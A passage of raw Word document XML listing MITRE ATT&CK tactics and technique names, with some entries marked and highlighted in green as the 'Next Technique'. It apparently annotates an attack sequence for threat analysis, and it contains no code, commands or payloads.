        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Resource Development ['T1608.001', 'T1585.002', 'T1608', 'T1583.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DD6947"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T1608.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Stage Capabilities&gt;:Upload Malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101CB5E4"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T1585.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Establish Accounts&gt;:Email Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387AB14A"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1608 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Stage Capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F025F8"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T1583.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Acquire Infrastructure&gt;:Domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ED7CDF"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0001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Initial Access ['T1091', 'T1566.001', 'T1566.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DC78CA"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1091 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Replication Through Removable Media</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A12A7F0" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="00704ECD" w:rsidRDefault="00B14585" w:rsidP="00C83F73">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00704ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1566.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00704ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00704ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00704ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C171C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T1566.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20361BEF"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0002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution ['T1053.005', 'T1059.003', 'T1047', 'T1204.001', 'T1203', 'T1204.002', 'T1059.001', 'T1059.005']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DA6E59"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C833F6" w14:textId="77777777" w:rsidR="00B14585" w:rsidRPr="007263B6" w:rsidRDefault="00B14585" w:rsidP="00C83F73">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007263B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1059.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007263B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7E1FDC"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1047 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows Management Instrumentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04991D4F"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T1204.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0105FFC6"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1203 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation for Client Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E31F88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704ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1204.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00704ECD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E17B287"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T1059.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E28AA6E"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T1059.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Visual Basic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691EF914"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0003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Persistence ['T1547.001', 'T1546.003', 'T1053.005', 'T1574.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64465A2B"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T1547.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FDFEA8"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T1546.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Event Triggered Execution&gt;:Windows Management Instrumentation Event Subscription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201F6779"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD14AEC"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T1574.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Side-Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3421E4"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0004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Privilege Escalation ['T1547.001', 'T1546.003', 'T1053.005', 'T1574.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A04FFDF"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T1547.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD8D1E6"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T1546.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Event Triggered Execution&gt;:Windows Management Instrumentation Event Subscription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F92DC2"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265D571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T1574.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Side-Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E24772"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0005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Evasion ['T1036.007', 'T1218.004', 'T1036.005', 'T1027.001', 'T1564.001', 'T1070.004', 'T1218.005', 'T1574.002', 'T1027']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DBCE8F"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T1036.007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Masquerading&gt;:Double File Extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F901E3C"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T1218.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>InstallUtil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="06E4DF48"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T1036.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Masquerading&gt;:Match Legitimate Name or Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15568DD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T1027.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obfuscated Files or Information&gt;:Binary Padding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348B81C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T1564.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hide Artifacts&gt;:Hidden Files and Directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FDF2D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T1070.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Indicator Removal on Host&gt;:File Deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37597274"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T1218.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mshta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7D8891E5"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771530">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1574.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00771530">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Hijack Execution Flow&gt;:DLL Side-Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B52028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r w:rsidRPr="00DA24A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DA24A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1027 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DA24A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14375367"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0006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential Access ['T1003.003']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29875AFB"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T1003.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;OS Credential Dumping&gt;:NTDS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BA0A60"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0007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Discovery ['T1049', 'T1082', 'T1057', 'T1016', 'T1083', 'T1518']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242CF1BF"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1049 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Connections Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B43034D"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1082 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Information Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E295CA"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1057 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Process Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039920C2"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1016 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Configuration Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248A52B3"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lastRenderedPageBreak/>
        <w:t>Next Technique is T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1083 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> File and Directory Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6993548C"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1518 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Software Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541F6F8D"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0008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Lateral Movement ['T1091']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55075541"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1091 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Replication Through Removable Media</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155E8112"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0009 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B14585">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
